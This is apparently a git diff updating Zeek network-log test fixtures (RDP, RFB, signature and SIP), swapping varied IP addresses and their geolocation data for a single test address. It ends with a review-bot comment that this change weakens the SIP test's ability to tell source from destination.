+++ b/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json
@@ -44,7 +44,7 @@
 "established": true
 },
 "event": {
- "ingested": "2021-08-11T19:18:34.597592900Z",
+ "ingested": "2021-12-09T13:51:07.959730500Z",
 "original": "{\"ts\":1568132339.668952,\"uid\":\"C2PcYV7D3ntaHm056\",\"id.orig_h\":\"192.168.131.1\",\"id.orig_p\":33872,\"id.resp_h\":\"192.168.131.131\",\"id.resp_p\":3389,\"result\":\"encrypted\",\"security_protocol\":\"HYBRID\",\"cert_count\":0,\"ssl\":true}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -110,7 +110,7 @@
 "established": true
 },
 "event": {
- "ingested": "2021-08-11T19:18:34.597602900Z",
+ "ingested": "2021-12-09T13:51:07.959740Z",
 "original": "{\"ts\":1568132339.668952,\"uid\":\"C2PcYV7D3ntaHm056\",\"id.orig_h\":\"192.168.131.1\",\"id.orig_p\":33872,\"id.resp_h\":\"192.168.131.131\",\"id.resp_p\":3389,\"result\":\"encrypted\",\"security_protocol\":\"HYBRID\",\"cert_count\":0,\"ssl\":true}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json b/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json
index 107f26d57f4..833175657c7 100644
--- a/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json
+++ b/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json 
@@ -45,7 +45,7 @@
 "ip": "192.168.1.123"
 },
 "event": {
- "ingested": "2021-08-11T19:18:35.038675300Z",
+ "ingested": "2021-12-09T13:51:08.328387900Z",
 "original": "{\"ts\":1328632534.517208,\"uid\":\"CXoIzM3wH3fUwXtKN1\",\"id.orig_h\":\"192.168.1.123\",\"id.orig_p\":58102,\"id.resp_h\":\"192.168.1.10\",\"id.resp_p\":5900,\"client_major_version\":\"003\",\"client_minor_version\":\"008\",\"server_major_version\":\"003\",\"server_minor_version\":\"008\",\"authentication_method\":\"VNC\",\"auth\":true,\"share_flag\":false,\"desktop_name\":\"\\u00a0\",\"width\":800,\"height\":600}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -128,7 +128,7 @@
 "name": "Lees-MBP.localdomain"
 },
 "event": {
- "ingested": "2021-08-11T19:18:35.038790900Z",
+ "ingested": "2021-12-09T13:51:08.328393600Z",
 "original": "{\"ts\":1328632534.517208,\"uid\":\"CXoIzM3wH3fUwXtKN1\",\"id.orig_h\":\"192.168.1.123\",\"id.orig_p\":58102,\"id.resp_h\":\"192.168.1.10\",\"id.resp_p\":5900,\"client_major_version\":\"003\",\"client_minor_version\":\"008\",\"server_major_version\":\"003\",\"server_minor_version\":\"008\",\"authentication_method\":\"VNC\",\"auth\":true,\"share_flag\":false,\"desktop_name\":\"\\u00a0\",\"width\":800,\"height\":600}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log b/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log
index 4725117d90e..3254e9e084e 100644
--- a/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log
+++ b/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log 
@@ -1 +1 @@
-{"ts": 1611852809.869245,"uid": "CbjAXE4CBxJ8W7VoJg","src_addr": "124.51.137.154","src_port": 51617,"dst_addr": "160.218.27.63","dst_port": 445,"note": "Signatures::Sensitive_Signature","sig_id": "my-second-sig","event_msg": "124.51.137.154: TCP traffic","sub_msg": ""}
+{"ts": 1611852809.869245,"uid": "CbjAXE4CBxJ8W7VoJg","src_addr": "89.160.20.156","src_port": 51617,"dst_addr": "89.160.20.156","dst_port": 445,"note": "Signatures::Sensitive_Signature","sig_id": "my-second-sig","event_msg": "89.160.20.156: TCP traffic","sub_msg": ""}
diff --git a/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json b/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json
index 9850d1fc4b4..84863c54ea1 100644
--- a/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json
+++ b/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json
@@ -4,22 +4,25 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "country_name": "Czechia",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": 14.4112,
- "lat": 50.0848
- },
- "country_iso_code": "CZ"
+ "lon": 17.8167,
+ "lat": 59.2
+ }
 },
 "as": {
- "number": 5610,
+ "number": 29518,
 "organization": {
- "name": "O2 Czech Republic, a.s."
+ "name": "Bredband2 AB"
 }
 },
- "address": "160.218.27.63",
+ "address": "89.160.20.156",
 "port": 445,
- "ip": "160.218.27.63"
+ "ip": "89.160.20.156"
 },
 "zeek": {
 "signature": { 
@@ -29,31 +32,31 @@
 "session_id": "CbjAXE4CBxJ8W7VoJg"
 },
 "rule": {
- "description": "124.51.137.154: TCP traffic",
+ "description": "89.160.20.156: TCP traffic",
 "id": "my-second-sig"
 },
 "source": {
 "geo": {
- "continent_name": "Asia",
- "region_iso_code": "KR-26",
- "city_name": "Busan",
- "country_iso_code": "KR",
- "country_name": "South Korea",
- "region_name": "Busan",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": 129.0442,
- "lat": 35.1003
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "as": {
- "number": 17858,
+ "number": 29518,
 "organization": {
- "name": "LG POWERCOMM"
+ "name": "Bredband2 AB"
 }
 },
- "address": "124.51.137.154",
+ "address": "89.160.20.156",
 "port": 51617,
- "ip": "124.51.137.154"
+ "ip": "89.160.20.156"
 },
 "tags": [
 "preserve_original_event"
@@ -67,13 +70,12 @@
 },
 "related": {
 "ip": [
- "124.51.137.154",
- "160.218.27.63"
+ "89.160.20.156"
 ]
 },
 "event": {
- "ingested": "2021-08-26T12:37:15.323536262Z",
- "original": "{\"ts\": 1611852809.869245,\"uid\": \"CbjAXE4CBxJ8W7VoJg\",\"src_addr\": \"124.51.137.154\",\"src_port\": 51617,\"dst_addr\": \"160.218.27.63\",\"dst_port\": 445,\"note\": \"Signatures::Sensitive_Signature\",\"sig_id\": \"my-second-sig\",\"event_msg\": \"124.51.137.154: TCP traffic\",\"sub_msg\": \"\"}",
+ "ingested": "2021-12-09T13:51:08.678071800Z",
+ "original": "{\"ts\": 1611852809.869245,\"uid\": \"CbjAXE4CBxJ8W7VoJg\",\"src_addr\": \"89.160.20.156\",\"src_port\": 51617,\"dst_addr\": \"89.160.20.156\",\"dst_port\": 445,\"note\": \"Signatures::Sensitive_Signature\",\"sig_id\": \"my-second-sig\",\"event_msg\": \"89.160.20.156: TCP traffic\",\"sub_msg\": \"\"}",
 "id": "CbjAXE4CBxJ8W7VoJg",
 "category": "network",
 "created": "2020-04-28T11:07:58.223Z", 
diff --git a/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log b/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log
index 1e9cc81643d..31694b9c500 100644
--- a/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log
+++ b/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log 
@@ -1,6 +1,6 @@
-{"ts":1361916159.055464,"uid":"CPRLCB4eWHdjP852Bk","id.orig_h":"172.16.133.19","id.orig_p":5060,"id.resp_h":"74.63.41.218","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:newyork.voip.ms:5060","request_from":"\u0022AppNeta\u0022 ","request_to":"","response_from":"\u0022AppNeta\u0022 ","response_to":";tag=as023f66a5","call_id":"8694cd7e-976e4fc3-d76f6e38@172.16.133.19","seq":"4127 REGISTER","request_path":["SIP/2.0/UDP 172.16.133.19:5060"],"response_path":["SIP/2.0/UDP 172.16.133.19:5060"],"user_agent":"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267","status_code":401,"status_msg":"Unauthorized","request_body_len":0,"response_body_len":0}
-{"ts":1105725482.965944,"uid":"ComJz236lSOcuOmix3","id.orig_h":"200.57.7.204","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"INVITE","uri":"sip:francisco@bestel.com:55060","request_from":"","request_to":"\u0022francisco@bestel.com\u0022 ","response_from":"","response_to":"\u0022francisco@bestel.com\u0022 ;tag=298852044","call_id":"12013223@200.57.7.195","seq":"1 INVITE","request_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"response_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061","SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"status_code":180,"status_msg":"Ringing","request_body_len":229,"response_body_len":0}
-{"ts":1105725487.022577,"uid":"CJZDWgixtwqXctWEg","id.orig_h":"200.57.7.205","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:Verso.com","request_from":"Ivan ","request_to":"Ivan ","response_from":"\u0022Ivan\u0022 ","response_to":"\u0022Ivan\u0022 ","call_id":"46E1C3CB36304F84A020CF6DD3F96461@Verso.com","seq":"37764 REGISTER","request_path":["SIP/2.0/UDP 200.57.7.205:5061;rport"],"response_path":["SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061"],"user_agent":"Verso Softphone release 
1104w","status_code":200,"status_msg":"OK","request_body_len":0,"response_body_len":0}
-{"ts":1617119416.928735,"uid":"CR6XQH1Lf2mF9YG7H2","id.orig_h":"193.107.216.13","id.orig_p":5083,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@35.198.74.222","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"767538559354206383610151","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 193.107.216.13:5083"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0}
-{"ts":1617119923.416653,"uid":"Cf9QMt4ear7ZkX74ti","id.orig_h":"45.134.144.100","id.orig_p":5170,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@35.198.74.222","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"35848812076538877174452","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 127.0.0.1:5170"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0}
-{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"200.57.7.205\",\"id.orig_p\":5061,\"id.resp_h\":\"200.57.7.195\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \",\"request_to\":\"Ivan \",\"response_from\":\"\\u0022Ivan\\u0022 \",\"response_to\":\"\\u0022Ivan\\u0022 \",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 200.57.7.205:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061\"],\"user_agent\":\"Verso Softphone release 1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 
UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/sip.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}}
+{"ts":1361916159.055464,"uid":"CPRLCB4eWHdjP852Bk","id.orig_h":"172.16.133.19","id.orig_p":5060,"id.resp_h":"89.160.20.156","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:newyork.voip.ms:5060","request_from":"\u0022AppNeta\u0022 ","request_to":"","response_from":"\u0022AppNeta\u0022 ","response_to":";tag=as023f66a5","call_id":"8694cd7e-976e4fc3-d76f6e38@172.16.133.19","seq":"4127 REGISTER","request_path":["SIP/2.0/UDP 172.16.133.19:5060"],"response_path":["SIP/2.0/UDP 172.16.133.19:5060"],"user_agent":"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267","status_code":401,"status_msg":"Unauthorized","request_body_len":0,"response_body_len":0}
+{"ts":1105725482.965944,"uid":"ComJz236lSOcuOmix3","id.orig_h":"89.160.20.156","id.orig_p":5061,"id.resp_h":"89.160.20.156","id.resp_p":5060,"trans_depth":0,"method":"INVITE","uri":"sip:francisco@bestel.com:55060","request_from":"","request_to":"\u0022francisco@bestel.com\u0022 ","response_from":"","response_to":"\u0022francisco@bestel.com\u0022 ;tag=298852044","call_id":"12013223@89.160.20.156","seq":"1 INVITE","request_path":["SIP/2.0/UDP 89.160.20.156","SIP/2.0/UDP 89.160.20.156:55061"],"response_path":["SIP/2.0/UDP 89.160.20.156","SIP/2.0/UDP 89.160.20.156:55061","SIP/2.0/UDP 89.160.20.156","SIP/2.0/UDP 89.160.20.156:55061"],"status_code":180,"status_msg":"Ringing","request_body_len":229,"response_body_len":0}
+{"ts":1105725487.022577,"uid":"CJZDWgixtwqXctWEg","id.orig_h":"89.160.20.156","id.orig_p":5061,"id.resp_h":"89.160.20.156","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:Verso.com","request_from":"Ivan ","request_to":"Ivan ","response_from":"\u0022Ivan\u0022 ","response_to":"\u0022Ivan\u0022 ","call_id":"46E1C3CB36304F84A020CF6DD3F96461@Verso.com","seq":"37764 
REGISTER","request_path":["SIP/2.0/UDP 89.160.20.156:5061;rport"],"response_path":["SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061"],"user_agent":"Verso Softphone release 1104w","status_code":200,"status_msg":"OK","request_body_len":0,"response_body_len":0}
+{"ts":1617119416.928735,"uid":"CR6XQH1Lf2mF9YG7H2","id.orig_h":"89.160.20.156","id.orig_p":5083,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@89.160.20.156","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"767538559354206383610151","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 89.160.20.156:5083"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0}
+{"ts":1617119923.416653,"uid":"Cf9QMt4ear7ZkX74ti","id.orig_h":"89.160.20.156","id.orig_p":5170,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@89.160.20.156","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"35848812076538877174452","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 127.0.0.1:5170"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0}
+{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \",\"request_to\":\"Ivan \",\"response_from\":\"\\u0022Ivan\\u0022 \",\"response_to\":\"\\u0022Ivan\\u0022 \",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061\"],\"user_agent\":\"Verso Softphone release 
1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/sip.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}}
diff --git a/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json b/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json
index f3d8141dd87..8ee74f2db18 100644
--- a/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json
+++ b/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json
@@ -3,23 +3,26 @@
 {
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 17.8167,
+ "lat": 59.2
+ }
 },
 "as": {
- "number": 29791,
+ "number": 29518,
 "organization": {
- "name": "Internap Corporation"
+ "name": "Bredband2 AB"
 }
 },
- "address": "74.63.41.218",
+ "address": "89.160.20.156",
 "port": 5060,
- "ip": "74.63.41.218"
+ "ip": "89.160.20.156"
 },
 "zeek": {
 "session_id": "CPRLCB4eWHdjP852Bk",
@@ -67,7 +70,7 @@
 ],
 "network": {
 "protocol": "sip",
- "community_id": "1:t8Jl0amIXPHemzxKgsLjtkB+ewo=",
+ "community_id": "1:qeURsPuZXF8ataWohrLnhZFa7/c=",
 "transport": "udp"
 },
 "@timestamp": "2013-02-26T22:02:39.055Z", 
@@ -77,12 +80,12 @@
 "related": {
 "ip": [
 "172.16.133.19",
- "74.63.41.218"
+ "89.160.20.156"
 ]
 },
 "event": {
- "ingested": "2021-08-11T19:18:35.589887400Z",
- "original": "{\"ts\":1361916159.055464,\"uid\":\"CPRLCB4eWHdjP852Bk\",\"id.orig_h\":\"172.16.133.19\",\"id.orig_p\":5060,\"id.resp_h\":\"74.63.41.218\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:newyork.voip.ms:5060\",\"request_from\":\"\\u0022AppNeta\\u0022 \u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"request_to\":\"\u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"response_from\":\"\\u0022AppNeta\\u0022 \u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"response_to\":\"\u003csip:116954_Boston6@newyork.voip.ms\u003e;tag=as023f66a5\",\"call_id\":\"8694cd7e-976e4fc3-d76f6e38@172.16.133.19\",\"seq\":\"4127 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 172.16.133.19:5060\"],\"response_path\":[\"SIP/2.0/UDP 172.16.133.19:5060\"],\"user_agent\":\"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267\",\"status_code\":401,\"status_msg\":\"Unauthorized\",\"request_body_len\":0,\"response_body_len\":0}",
+ "ingested": "2021-12-09T13:51:09.041817900Z",
+ "original": "{\"ts\":1361916159.055464,\"uid\":\"CPRLCB4eWHdjP852Bk\",\"id.orig_h\":\"172.16.133.19\",\"id.orig_p\":5060,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:newyork.voip.ms:5060\",\"request_from\":\"\\u0022AppNeta\\u0022 \u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"request_to\":\"\u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"response_from\":\"\\u0022AppNeta\\u0022 \u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"response_to\":\"\u003csip:116954_Boston6@newyork.voip.ms\u003e;tag=as023f66a5\",\"call_id\":\"8694cd7e-976e4fc3-d76f6e38@172.16.133.19\",\"seq\":\"4127 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 172.16.133.19:5060\"],\"response_path\":[\"SIP/2.0/UDP 
172.16.133.19:5060\"],\"user_agent\":\"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267\",\"status_code\":401,\"status_msg\":\"Unauthorized\",\"request_body_len\":0,\"response_body_len\":0}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "action": "REGISTER",
@@ -101,36 +104,36 @@
 {
 "destination": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "MX-CMX",
- "city_name": "Mexico City",
- "country_iso_code": "MX",
- "country_name": "Mexico",
- "region_name": "Mexico City",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -99.1438,
- "lat": 19.4357
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "as": {
- "number": 18734,
+ "number": 29518,
 "organization": {
- "name": "Operbes, S.A. de C.V."
+ "name": "Bredband2 AB"
 }
 },
- "address": "200.57.7.195",
+ "address": "89.160.20.156",
 "port": 5060,
- "ip": "200.57.7.195"
+ "ip": "89.160.20.156"
 },
 "zeek": {
 "session_id": "ComJz236lSOcuOmix3",
 "sip": {
 "request": {
 "path": [
- "SIP/2.0/UDP 200.57.7.195",
- "SIP/2.0/UDP 200.57.7.195:55061"
+ "SIP/2.0/UDP 89.160.20.156",
+ "SIP/2.0/UDP 89.160.20.156:55061"
 ],
- "from": "\u003csip:200.57.7.195:55061;user=phone\u003e",
+ "from": "\u003csip:89.160.20.156:55061;user=phone\u003e",
 "to": "\"francisco@bestel.com\" \u003csip:francisco@bestel.com:55060\u003e",
 "body_length": 229
 }, 
@@ -140,18 +143,18 @@
 },
 "response": {
 "path": [
- "SIP/2.0/UDP 200.57.7.195",
- "SIP/2.0/UDP 200.57.7.195:55061",
- "SIP/2.0/UDP 200.57.7.195",
- "SIP/2.0/UDP 200.57.7.195:55061"
+ "SIP/2.0/UDP 89.160.20.156",
+ "SIP/2.0/UDP 89.160.20.156:55061",
+ "SIP/2.0/UDP 89.160.20.156",
+ "SIP/2.0/UDP 89.160.20.156:55061"
 ],
- "from": "\u003csip:200.57.7.195:55061;user=phone\u003e",
+ "from": "\u003csip:89.160.20.156:55061;user=phone\u003e",
 "to": "\"francisco@bestel.com\" \u003csip:francisco@bestel.com:55060\u003e;tag=298852044",
 "body_length": 0
 },
 "uri": "sip:francisco@bestel.com:55060",
 "transaction_depth": 0,
- "call_id": "12013223@200.57.7.195",
+ "call_id": "12013223@89.160.20.156",
 "status": {
 "msg": "Ringing",
 "code": 180
@@ -160,26 +163,26 @@
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "MX-CMX",
- "city_name": "Mexico City",
- "country_iso_code": "MX",
- "country_name": "Mexico",
- "region_name": "Mexico City",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -99.1438,
- "lat": 19.4357
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "as": {
- "number": 18734,
+ "number": 29518,
 "organization": {
- "name": "Operbes, S.A. de C.V."
+ "name": "Bredband2 AB"
 }
 },
- "address": "200.57.7.204",
+ "address": "89.160.20.156",
 "port": 5061,
- "ip": "200.57.7.204"
+ "ip": "89.160.20.156"
 },
 "url": {
 "full": "sip:francisco@bestel.com:55060"
@@ -189,7 +192,7 @@
 ],
 "network": {
 "protocol": "sip",
- "community_id": "1:U/Makwsc8lm6pVKLfRMzoNTI++0=",
+ "community_id": "1:epsmqZ4+HVOOBLHj+vSEzlRIwbM=",
 "transport": "udp"
 },
 "@timestamp": "2005-01-14T17:58:02.965Z", 
@@ -198,13 +201,12 @@ }, "related": { "ip": [ - "200.57.7.204", - "200.57.7.195" + "89.160.20.156" ] }, "event": { - "ingested": "2021-08-11T19:18:35.589901300Z", - "original": "{\"ts\":1105725482.965944,\"uid\":\"ComJz236lSOcuOmix3\",\"id.orig_h\":\"200.57.7.204\",\"id.orig_p\":5061,\"id.resp_h\":\"200.57.7.195\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"INVITE\",\"uri\":\"sip:francisco@bestel.com:55060\",\"request_from\":\"\u003csip:200.57.7.195:55061;user=phone\u003e\",\"request_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e\",\"response_from\":\"\u003csip:200.57.7.195:55061;user=phone\u003e\",\"response_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e;tag=298852044\",\"call_id\":\"12013223@200.57.7.195\",\"seq\":\"1 INVITE\",\"request_path\":[\"SIP/2.0/UDP 200.57.7.195\",\"SIP/2.0/UDP 200.57.7.195:55061\"],\"response_path\":[\"SIP/2.0/UDP 200.57.7.195\",\"SIP/2.0/UDP 200.57.7.195:55061\",\"SIP/2.0/UDP 200.57.7.195\",\"SIP/2.0/UDP 200.57.7.195:55061\"],\"status_code\":180,\"status_msg\":\"Ringing\",\"request_body_len\":229,\"response_body_len\":0}", + "ingested": "2021-12-09T13:51:09.041826300Z", + "original": "{\"ts\":1105725482.965944,\"uid\":\"ComJz236lSOcuOmix3\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"INVITE\",\"uri\":\"sip:francisco@bestel.com:55060\",\"request_from\":\"\u003csip:89.160.20.156:55061;user=phone\u003e\",\"request_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e\",\"response_from\":\"\u003csip:89.160.20.156:55061;user=phone\u003e\",\"response_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e;tag=298852044\",\"call_id\":\"12013223@89.160.20.156\",\"seq\":\"1 INVITE\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\"],\"response_path\":[\"SIP/2.0/UDP 
89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\",\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\"],\"status_code\":180,\"status_msg\":\"Ringing\",\"request_body_len\":229,\"response_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "INVITE", @@ -222,33 +224,33 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "MX-CMX", - "city_name": "Mexico City", - "country_iso_code": "MX", - "country_name": "Mexico", - "region_name": "Mexico City", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -99.1438, - "lat": 19.4357 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 18734, + "number": 29518, "organization": { - "name": "Operbes, S.A. de C.V." + "name": "Bredband2 AB" } }, - "address": "200.57.7.195", + "address": "89.160.20.156", "port": 5060, - "ip": "200.57.7.195" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CJZDWgixtwqXctWEg", "sip": { "request": { "path": [ - "SIP/2.0/UDP 200.57.7.205:5061;rport" + "SIP/2.0/UDP 89.160.20.156:5061;rport" ], "from": "Ivan \u003csip:Ivan@Verso.com\u003e", "to": "Ivan \u003csip:Ivan@Verso.com\u003e", @@ -260,7 +262,7 @@ }, "response": { "path": [ - "SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061" + "SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061" ], "from": "\"Ivan\" \u003csip:Ivan@Verso.com\u003e", "to": "\"Ivan\" \u003csip:Ivan@Verso.com\u003e", 
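Review bot: Substituting the same address for both `id.orig_h` and `id.resp_h` in the INVITE fixture (the `original` line in this hunk) collapses `related.ip` to a single entry and makes SIP source and destination indistinguishable, so this expected output no longer verifies that the pipeline enriches the two endpoints independently or that `related.ip` is populated from both sides. A pipeline bug that swapped `source.geo`/`source.as` with `destination.geo`/`destination.as` would now pass this test unnoticed. If the supported subset contains more than one address, use a distinct one for the responder (`id.resp_h`) so the fixture keeps exercising both endpoints; that change belongs in the input log these expected files are regenerated from, which is outside this hunk. Note also that two sessions with different `uid`s now share `network.community_id` `1:epsmqZ4+HVOOBLHj+vSEzlRIwbM=` because their 5-tuples became identical, which is consistent with the algorithm but further reduces what the fixture can detect.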
